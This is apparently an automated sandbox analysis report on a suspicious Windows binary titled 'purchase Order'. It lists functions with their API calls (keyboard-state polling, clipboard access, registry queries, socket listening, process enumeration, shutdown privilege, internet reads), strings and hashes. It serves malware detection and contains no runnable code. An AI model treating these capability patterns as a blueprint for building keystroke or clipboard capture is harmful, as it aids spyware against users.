Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA328E

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CA332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CA33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CA3604
RegCloseKey.ADVAPI32(00000000), ref: 00CA3611

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 1ad83aae3d79a3531f81c04fff164d9dc96960be0db21176f6e9f150870f1dac
Instruction ID: 291201d4c9fe4e8df76d1700bbbc90573c0ed9d8369033b85617f0e2415c4290
Opcode Fuzzy Hash: 1ad83aae3d79a3531f81c04fff164d9dc96960be0db21176f6e9f150870f1dac
Instruction Fuzzy Hash: 1CE16C31604211AFCB14DF29C895E2ABBE8FF89714F04856DF45AD72A1DB30EE05DB52

Function 00C82B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C82B5F
GetAsyncKeyState.USER32(000000A0), ref: 00C82BE0
GetKeyState.USER32(000000A0), ref: 00C82BFB
GetAsyncKeyState.USER32(000000A1), ref: 00C82C15
GetKeyState.USER32(000000A1), ref: 00C82C2A
GetAsyncKeyState.USER32(00000011), ref: 00C82C42
GetKeyState.USER32(00000011), ref: 00C82C54
GetAsyncKeyState.USER32(00000012), ref: 00C82C6C
GetKeyState.USER32(00000012), ref: 00C82C7E
GetAsyncKeyState.USER32(0000005B), ref: 00C82C96
GetKeyState.USER32(0000005B), ref: 00C82CA8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c9a1d9556f4be42e02067392838218c1b59f294510d8a0236c7f132fdea67f47
Instruction ID: ce077a224ef66ef7778637a4d4a21fdc1dc0e0516860ef2b875bad2b05c1a83d
Opcode Fuzzy Hash: c9a1d9556f4be42e02067392838218c1b59f294510d8a0236c7f132fdea67f47
Instruction Fuzzy Hash: 0541C4706047C96EFF30BB60890C7BABEA06B1134CF044099D5D7562C1EBA49BC4C7AA

Function 00C96D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C96D2E
EmptyClipboard.USER32 ref: 00C96D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00C96D49
CloseClipboard.USER32 ref: 00C96DE8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2872d3760c2cbcce710899aab5be076b36a8ac768636e61c412237ad04a11f3d
Instruction ID: 80d31bb591c3794d44a240d13be19f7d5bbaaf88d6ba733660d4776de4b3cb51
Opcode Fuzzy Hash: 2872d3760c2cbcce710899aab5be076b36a8ac768636e61c412237ad04a11f3d
Instruction Fuzzy Hash: AE215A36200210AFEB11AF65EC49F2EB7A8EF44711F048469F95ADB2A1DB34ED41DB54

Function 00C9C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00C79ABF: CLSIDFromProgID.OLE32 ref: 00C79ADC
Part of subcall function 00C79ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00C79AF7
Part of subcall function 00C79ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00C79B05
Part of subcall function 00C79ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C79B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C9C235
_memset.LIBCMT ref: 00C9C242
_memset.LIBCMT ref: 00C9C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00C9C38C
CoTaskMemFree.OLE32(?), ref: 00C9C397

Strings

NULL Pointer assignment, xrefs: 00C9C3E5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 209bca401922bc99cd15c92965a76214ec7e428540fe428c57cd509c46c6e9af
Instruction ID: 966706e08c0cbabc70bc30998b598219765604387fa0baeacea5dfc43f5cfc5c
Opcode Fuzzy Hash: 209bca401922bc99cd15c92965a76214ec7e428540fe428c57cd509c46c6e9af
Instruction Fuzzy Hash: 86910771D00218ABDF10DF94DC95EEEBBB8FF08710F10816AE919A7291DB709A45DFA0

Function 00C879D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7B180
Part of subcall function 00C7B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7B1AD
Part of subcall function 00C7B134: GetLastError.KERNEL32 ref: 00C7B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00C87A0F

Strings

SeShutdownPrivilege, xrefs: 00C879DD
, xrefs: 00C879FD
@, xrefs: 00C87A02

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: d46a0c5de524acc62e4fbf11be2545ef733bf4415795363c457e72bf56145a0f
Instruction ID: 342c8221c4ed12f7bf350a70c4f4fe1a1ea2ff5d4a0e82cd53ffa2c1d7969e16
Opcode Fuzzy Hash: d46a0c5de524acc62e4fbf11be2545ef733bf4415795363c457e72bf56145a0f
Instruction Fuzzy Hash: E301D8716582116AE72C3664CC8AFFF32589B00348F341624F913A20C1F560DF00A3B8

Function 00C98C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C98CA8
WSAGetLastError.WSOCK32(00000000), ref: 00C98CB7
bind.WSOCK32(00000000,?,00000010), ref: 00C98CD3
listen.WSOCK32(00000000,00000005), ref: 00C98CE2
WSAGetLastError.WSOCK32(00000000), ref: 00C98CFC
closesocket.WSOCK32(00000000,00000000), ref: 00C98D10

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 5de8bf3fcad472efc50003d1ac99deb0d19f898742fb590542ffcd07478a732b
Instruction ID: c4114381c8e18de036eddd57087bc73fe848cfac2d7c5f1db95918223ad0e961
Opcode Fuzzy Hash: 5de8bf3fcad472efc50003d1ac99deb0d19f898742fb590542ffcd07478a732b
Instruction Fuzzy Hash: 0821EF316002019FCB10EF68C889F6EB7E9EF4A724F108558F957A72D2CB70AE45DB65

Function 00C86532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C86554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00C86564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00C86583
__wsplitpath.LIBCMT ref: 00C865A7
_wcscat.LIBCMT ref: 00C865BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C865F9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: dcf0fc5556dd6dd3d6b2233e568eafc09fb6908de5a94587f834329dba506dfc
Instruction ID: a9871debb231c7f47b1a2cfecd64fe0a418c0c2f7845d43299ac1581ee12450a
Opcode Fuzzy Hash: dcf0fc5556dd6dd3d6b2233e568eafc09fb6908de5a94587f834329dba506dfc
Instruction Fuzzy Hash: 95219F71900219ABDB20BFA4CC88FEEBBBCAB48314F5000A9E505E7141EB719F85CB60

Function 00C9923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C9A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00C99296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 00C992B9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 4158ed88069e590c99abe68311b0aeb1adb5cc9986452d0a7952b2c6a6a48fbf
Instruction ID: c003fe840349461bb3150864e44a905277595c4fd222065f61b4903d2042b42d
Opcode Fuzzy Hash: 4158ed88069e590c99abe68311b0aeb1adb5cc9986452d0a7952b2c6a6a48fbf
Instruction Fuzzy Hash: 8F41CC70600200AFEB10AF68C886F7E77EDEF44724F04845CF956AB2D2CA74AE419B95

Function 00C8EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C8EB8A
_wcscmp.LIBCMT ref: 00C8EBBA
_wcscmp.LIBCMT ref: 00C8EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 00C8EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C8EC0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 519606e2a302b4aaf42b053241db7ece3843052496a26c03e676885b60c3f3bb
Instruction ID: dc95791046b2bbe8539bc00c63f1a4e766df7e43268e1009571d2935b2bd6ac6
Opcode Fuzzy Hash: 519606e2a302b4aaf42b053241db7ece3843052496a26c03e676885b60c3f3bb
Instruction Fuzzy Hash: 1B41C0356043019FC718EF28C490EAAB3E4FF4A328F10455DE96A8B3A1DB31F945CB59

Function 00CA8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00CA8160
IsWindowEnabled.USER32 ref: 00CA816E
GetForegroundWindow.USER32(?,?,00000001), ref: 00CA817B
IsIconic.USER32 ref: 00CA8189
IsZoomed.USER32 ref: 00CA8197

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 5ad5c207e8d9f9b427203991ba006068353e8677792486f1cbbc391e75594167
Instruction ID: 460180ad7e4a7301ef6deace1f97eb6d9dadd64eba89c09a0cf9f01091523543
Opcode Fuzzy Hash: 5ad5c207e8d9f9b427203991ba006068353e8677792486f1cbbc391e75594167
Instruction Fuzzy Hash: D011E7317001126FE7216F26DC84F6FBB9CEF46764B044429FA5AD7241CF30E94786A4

Function 00C49B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00C49EA7
ERCP, xrefs: 00C49C32
VUUU, xrefs: 00C49ED4
VUUU, xrefs: 00C49E95
VUUU, xrefs: 00CCBE14

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: f7fc5dd977809a670aaf1e7a8c2c1967aba19d0a7dc1ec7252f8a43502c6c73f
Instruction ID: 5d45479c11767900120a256c4c638d9eca26afb3b7490ca95feab1dbe06f400d
Opcode Fuzzy Hash: f7fc5dd977809a670aaf1e7a8c2c1967aba19d0a7dc1ec7252f8a43502c6c73f
Instruction Fuzzy Hash: 86927271E0022ACBDF24CF99C881BBEB7B1FB54314F14819AD82AA7280D7759E85DF51

Function 00C5E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C5E014,76F90AE0,00C5DEF1,00CDDC38,?,?), ref: 00C5E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C5E03E

Strings

GetNativeSystemInfo, xrefs: 00C5E038
kernel32.dll, xrefs: 00C5E027

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 33e815c48ec12f396cae1c42114bb0c6d7c6bf004ec745bf268b46df5783772d
Instruction ID: 7fce2d6fb37692995b0d767c664c4349f6ecaa29f40769b2cbc11cdb6c17b18c
Opcode Fuzzy Hash: 33e815c48ec12f396cae1c42114bb0c6d7c6bf004ec745bf268b46df5783772d
Instruction Fuzzy Hash: 82D0A7358007129FC7354F60EC08B7A76D4AB00312F2C4439E892D2190D7B4C9C48650

Function 00C813CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C813DC

Strings

(, xrefs: 00C81422
|, xrefs: 00C8140C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: dd42fd229e72d2915a32ad6e3fa58d0a7db247b158e78ef2602d59760251e173
Instruction ID: a47fc054373d65e0672862200787242638389cef03c4745701861d2e25aea6c4
Opcode Fuzzy Hash: dd42fd229e72d2915a32ad6e3fa58d0a7db247b158e78ef2602d59760251e173
Instruction Fuzzy Hash: 71324875A007059FC728DF69C48096AB7F4FF48324B15C46EE9AADB3A1D770E982CB44

Function 00C5B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 00C5B22F

Part of subcall function 00C5B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C5B5A5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 88dddfb0f841319e2219a6b5eb420ce3374aace12beffb52b24ee1851b00a366
Instruction ID: 9e0e6f545c6413355dd408d20e9752a46474d4a2cda3d835e720c147155c393a
Opcode Fuzzy Hash: 88dddfb0f841319e2219a6b5eb420ce3374aace12beffb52b24ee1851b00a366
Instruction Fuzzy Hash: 83A176B8114105BADB386B6B8C89EFF6D6CEF42747F10411DFC12D2191CB249E89E67A

Function 00C94EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C943BF,00000000), ref: 00C94FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C94FD2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 4190563a30cbc96f58e92e15076ea54d096770857880df4d66764cc4f900610c
Instruction ID: b0ce66ab51b2bfebefb9155f36eafa58ea331e56ce49f8b3cb1103c8e61c70c0
Opcode Fuzzy Hash: 4190563a30cbc96f58e92e15076ea54d096770857880df4d66764cc4f900610c
Instruction Fuzzy Hash: 9741E47150460ABFEF259F91CC89EBFB7ACEB40718F10006EF605A6181EA719F4297A0

Function 00C8E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C8E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C8E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C8E2B4

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: d9d1a7a36b08464e18cf252185940b35cceaaa9a4d819826d9f2ace95f0fa3d3
Instruction ID: 8a579d14397ad04cb6ebbf939c0f8a4901092e6def76277043f97a6a26d186ff
Opcode Fuzzy Hash: d9d1a7a36b08464e18cf252185940b35cceaaa9a4d819826d9f2ace95f0fa3d3
Instruction Fuzzy Hash: 4C215C35A00118EFDB00EFA5D884EAEBBB8FF49314F0584A9E946AB251DB31A945CB54

Function 00C7B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C5F4EA: std::exception::exception.LIBCMT ref: 00C5F51E
Part of subcall function 00C5F4EA: __CxxThrowException@8.LIBCMT ref: 00C5F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7B1AD
GetLastError.KERNEL32 ref: 00C7B1BA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 49c3b63e3229ae44f9f46a0c42136a5d06336ffeebd0f2d2236d41fdd2a7502b
Instruction ID: 57d0c4bb19bfb57bf8d169e3e765f92b33299a086ad485a2100a9124c6dc1bdb
Opcode Fuzzy Hash: 49c3b63e3229ae44f9f46a0c42136a5d06336ffeebd0f2d2236d41fdd2a7502b
